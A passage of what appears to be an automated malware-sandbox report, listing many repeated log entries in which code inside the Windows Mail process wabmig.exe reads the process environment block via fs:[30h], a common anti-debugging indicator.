          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F2D0 mov eax, dword ptr fs:[00000030h]10_2_2199F2D0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219792C5 mov eax, dword ptr fs:[00000030h]10_2_219792C5
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219792C5 mov eax, dword ptr fs:[00000030h]10_2_219792C5
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A2C3 mov eax, dword ptr fs:[00000030h]10_2_2197A2C3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A2C3 mov eax, dword ptr fs:[00000030h]10_2_2197A2C3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A2C3 mov eax, dword ptr fs:[00000030h]10_2_2197A2C3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A2C3 mov eax, dword ptr fs:[00000030h]10_2_2197A2C3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A2C3 mov eax, dword ptr fs:[00000030h]10_2_2197A2C3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C0 mov eax, dword ptr fs:[00000030h]10_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C0 mov eax, dword ptr fs:[00000030h]10_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C0 mov eax, dword ptr fs:[00000030h]10_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C0 mov eax, dword ptr fs:[00000030h]10_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C0 mov eax, dword ptr fs:[00000030h]10_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C0 mov eax, dword ptr fs:[00000030h]10_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C0 mov eax, dword ptr fs:[00000030h]10_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2F2F8 mov eax, dword ptr fs:[00000030h]10_2_21A2F2F8
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219692FF mov eax, dword ptr fs:[00000030h]10_2_219692FF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219802E1 mov eax, dword ptr fs:[00000030h]10_2_219802E1
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219802E1 mov eax, dword ptr fs:[00000030h]10_2_219802E1
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219802E1 mov eax, dword ptr fs:[00000030h]10_2_219802E1
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A45227 mov eax, dword ptr fs:[00000030h]10_2_21A45227
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A7208 mov eax, dword ptr fs:[00000030h]10_2_219A7208
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A7208 mov eax, dword ptr fs:[00000030h]10_2_219A7208
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196823B mov eax, dword ptr fs:[00000030h]10_2_2196823B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196A250 mov eax, dword ptr fs:[00000030h]10_2_2196A250
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3D26B mov eax, dword ptr fs:[00000030h]10_2_21A3D26B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3D26B mov eax, dword ptr fs:[00000030h]10_2_21A3D26B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21976259 mov eax, dword ptr fs:[00000030h]10_2_21976259
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21969240 mov eax, dword ptr fs:[00000030h]10_2_21969240
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21969240 mov eax, dword ptr fs:[00000030h]10_2_21969240
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A724D mov eax, dword ptr fs:[00000030h]10_2_219A724D
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B1270 mov eax, dword ptr fs:[00000030h]10_2_219B1270
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B1270 mov eax, dword ptr fs:[00000030h]10_2_219B1270
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21999274 mov eax, dword ptr fs:[00000030h]10_2_21999274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2B256 mov eax, dword ptr fs:[00000030h]10_2_21A2B256
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2B256 mov eax, dword ptr fs:[00000030h]10_2_21A2B256
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21974260 mov eax, dword ptr fs:[00000030h]10_2_21974260
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21974260 mov eax, dword ptr fs:[00000030h]10_2_21974260
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21974260 mov eax, dword ptr fs:[00000030h]10_2_21974260
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196826B mov eax, dword ptr fs:[00000030h]10_2_2196826B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE59C mov eax, dword ptr fs:[00000030h]10_2_219AE59C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219FB594 mov eax, dword ptr fs:[00000030h]10_2_219FB594
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219FB594 mov eax, dword ptr fs:[00000030h]10_2_219FB594
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A4588 mov eax, dword ptr fs:[00000030h]10_2_219A4588
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21972582 mov eax, dword ptr fs:[00000030h]10_2_21972582
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21972582 mov ecx, dword ptr fs:[00000030h]10_2_21972582
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196758F mov eax, dword ptr fs:[00000030h]10_2_2196758F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196758F mov eax, dword ptr fs:[00000030h]10_2_2196758F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196758F mov eax, dword ptr fs:[00000030h]10_2_2196758F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A035BA mov eax, dword ptr fs:[00000030h]10_2_21A035BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A035BA mov eax, dword ptr fs:[00000030h]10_2_21A035BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A035BA mov eax, dword ptr fs:[00000030h]10_2_21A035BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A035BA mov eax, dword ptr fs:[00000030h]10_2_21A035BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2F5BE mov eax, dword ptr fs:[00000030h]10_2_21A2F5BE
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219945B1 mov eax, dword ptr fs:[00000030h]10_2_219945B1
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219945B1 mov eax, dword ptr fs:[00000030h]10_2_219945B1
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915A9 mov eax, dword ptr fs:[00000030h]10_2_219915A9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915A9 mov eax, dword ptr fs:[00000030h]10_2_219915A9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915A9 mov eax, dword ptr fs:[00000030h]10_2_219915A9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915A9 mov eax, dword ptr fs:[00000030h]10_2_219915A9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915A9 mov eax, dword ptr fs:[00000030h]10_2_219915A9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F05A7 mov eax, dword ptr fs:[00000030h]10_2_219F05A7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F05A7 mov eax, dword ptr fs:[00000030h]10_2_219F05A7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F05A7 mov eax, dword ptr fs:[00000030h]10_2_219F05A7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219995DA mov eax, dword ptr fs:[00000030h]10_2_219995DA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219765D0 mov eax, dword ptr fs:[00000030h]10_2_219765D0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AA5D0 mov eax, dword ptr fs:[00000030h]10_2_219AA5D0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AA5D0 mov eax, dword ptr fs:[00000030h]10_2_219AA5D0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE5CF mov eax, dword ptr fs:[00000030h]10_2_219AE5CF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE5CF mov eax, dword ptr fs:[00000030h]10_2_219AE5CF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A55C0 mov eax, dword ptr fs:[00000030h]10_2_219A55C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A455C9 mov eax, dword ptr fs:[00000030h]10_2_21A455C9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915F4 mov eax, dword ptr fs:[00000030h]10_2_219915F4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915F4 mov eax, dword ptr fs:[00000030h]10_2_219915F4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915F4 mov eax, dword ptr fs:[00000030h]10_2_219915F4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915F4 mov eax, dword ptr fs:[00000030h]10_2_219915F4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915F4 mov eax, dword ptr fs:[00000030h]10_2_219915F4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915F4 mov eax, dword ptr fs:[00000030h]10_2_219915F4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A435D7 mov eax, dword ptr fs:[00000030h]10_2_21A435D7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A435D7 mov eax, dword ptr fs:[00000030h]10_2_21A435D7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A435D7 mov eax, dword ptr fs:[00000030h]10_2_21A435D7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AC5ED mov eax, dword ptr fs:[00000030h]10_2_219AC5ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AC5ED mov eax, dword ptr fs:[00000030h]10_2_219AC5ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219725E0 mov eax, dword ptr fs:[00000030h]10_2_219725E0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1F525 mov eax, dword ptr fs:[00000030h]10_2_21A1F525
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1F525 mov eax, dword ptr fs:[00000030h]10_2_21A1F525
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1F525 mov eax, dword ptr fs:[00000030h]10_2_21A1F525
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1F525 mov eax, dword ptr fs:[00000030h]10_2_21A1F525
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1F525 mov eax, dword ptr fs:[00000030h]10_2_21A1F525
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1F525 mov eax, dword ptr fs:[00000030h]10_2_21A1F525
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1F525 mov eax, dword ptr fs:[00000030h]10_2_21A1F525
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2B52F mov eax, dword ptr fs:[00000030h]10_2_21A2B52F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A45537 mov eax, dword ptr fs:[00000030h]10_2_21A45537
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A7505 mov eax, dword ptr fs:[00000030h]10_2_219A7505
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A7505 mov ecx, dword ptr fs:[00000030h]10_2_219A7505
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197D534 mov eax, dword ptr fs:[00000030h]10_2_2197D534
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197D534 mov eax, dword ptr fs:[00000030h]10_2_2197D534
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197D534 mov eax, dword ptr fs:[00000030h]10_2_2197D534
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197D534 mov eax, dword ptr fs:[00000030h]10_2_2197D534
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197D534 mov eax, dword ptr fs:[00000030h]10_2_2197D534
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197D534 mov eax, dword ptr fs:[00000030h]10_2_2197D534
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A44500 mov eax, dword ptr fs:[00000030h]10_2_21A44500
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A44500 mov eax, dword ptr fs:[00000030h]10_2_21A44500
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A44500 mov eax, dword ptr fs:[00000030h]10_2_21A44500
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A44500 mov eax, dword ptr fs:[00000030h]10_2_21A44500
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A44500 mov eax, dword ptr fs:[00000030h]10_2_21A44500
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A44500 mov eax, dword ptr fs:[00000030h]10_2_21A44500
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A44500 mov eax, dword ptr fs:[00000030h]10_2_21A44500
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E53E mov eax, dword ptr fs:[00000030h]10_2_2199E53E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E53E mov eax, dword ptr fs:[00000030h]10_2_2199E53E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E53E mov eax, dword ptr fs:[00000030h]10_2_2199E53E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E53E mov eax, dword ptr fs:[00000030h]10_2_2199E53E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E53E mov eax, dword ptr fs:[00000030h]10_2_2199E53E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AD530 mov eax, dword ptr fs:[00000030h]10_2_219AD530
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AD530 mov eax, dword ptr fs:[00000030h]10_2_219AD530
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980535 mov eax, dword ptr fs:[00000030h]10_2_21980535
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980535 mov eax, dword ptr fs:[00000030h]10_2_21980535
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980535 mov eax, dword ptr fs:[00000030h]10_2_21980535
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980535 mov eax, dword ptr fs:[00000030h]10_2_21980535
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980535 mov eax, dword ptr fs:[00000030h]10_2_21980535
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980535 mov eax, dword ptr fs:[00000030h]10_2_21980535
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21978550 mov eax, dword ptr fs:[00000030h]10_2_21978550
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21978550 mov eax, dword ptr fs:[00000030h]10_2_21978550
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AB570 mov eax, dword ptr fs:[00000030h]10_2_219AB570
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AB570 mov eax, dword ptr fs:[00000030h]10_2_219AB570
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A656A mov eax, dword ptr fs:[00000030h]10_2_219A656A
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A656A mov eax, dword ptr fs:[00000030h]10_2_219A656A
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A656A mov eax, dword ptr fs:[00000030h]10_2_219A656A
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196B562 mov eax, dword ptr fs:[00000030h]10_2_2196B562
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21979486 mov eax, dword ptr fs:[00000030h]10_2_21979486
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21979486 mov eax, dword ptr fs:[00000030h]10_2_21979486
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196B480 mov eax, dword ptr fs:[00000030h]10_2_2196B480
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A34B0 mov eax, dword ptr fs:[00000030h]10_2_219A34B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A44B0 mov ecx, dword ptr fs:[00000030h]10_2_219A44B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219FA4B0 mov eax, dword ptr fs:[00000030h]10_2_219FA4B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219764AB mov eax, dword ptr fs:[00000030h]10_2_219764AB
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A194E0 mov eax, dword ptr fs:[00000030h]10_2_21A194E0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219704E5 mov ecx, dword ptr fs:[00000030h]10_2_219704E5
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A454DB mov eax, dword ptr fs:[00000030h]10_2_21A454DB
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199340D mov eax, dword ptr fs:[00000030h]10_2_2199340D
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A8402 mov eax, dword ptr fs:[00000030h]10_2_219A8402
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A8402 mov eax, dword ptr fs:[00000030h]10_2_219A8402
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A8402 mov eax, dword ptr fs:[00000030h]10_2_219A8402
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196C427 mov eax, dword ptr fs:[00000030h]10_2_2196C427
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196E420 mov eax, dword ptr fs:[00000030h]10_2_2196E420
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196E420 mov eax, dword ptr fs:[00000030h]10_2_2196E420
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196E420 mov eax, dword ptr fs:[00000030h]10_2_2196E420
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199245A mov eax, dword ptr fs:[00000030h]10_2_2199245A
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196645D mov eax, dword ptr fs:[00000030h]10_2_2196645D
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197B440 mov eax, dword ptr fs:[00000030h]10_2_2197B440
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197B440 mov eax, dword ptr fs:[00000030h]10_2_2197B440
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197B440 mov eax, dword ptr fs:[00000030h]10_2_2197B440
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197B440 mov eax, dword ptr fs:[00000030h]10_2_2197B440
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197B440 mov eax, dword ptr fs:[00000030h]10_2_2197B440
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197B440 mov eax, dword ptr fs:[00000030h]10_2_2197B440
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE443 mov eax, dword ptr fs:[00000030h]10_2_219AE443
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE443 mov eax, dword ptr fs:[00000030h]10_2_219AE443
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE443 mov eax, dword ptr fs:[00000030h]10_2_219AE443
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE443 mov eax, dword ptr fs:[00000030h]10_2_219AE443
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE443 mov eax, dword ptr fs:[00000030h]10_2_219AE443
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE443 mov eax, dword ptr fs:[00000030h]10_2_219AE443
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE443 mov eax, dword ptr fs:[00000030h]10_2_219AE443
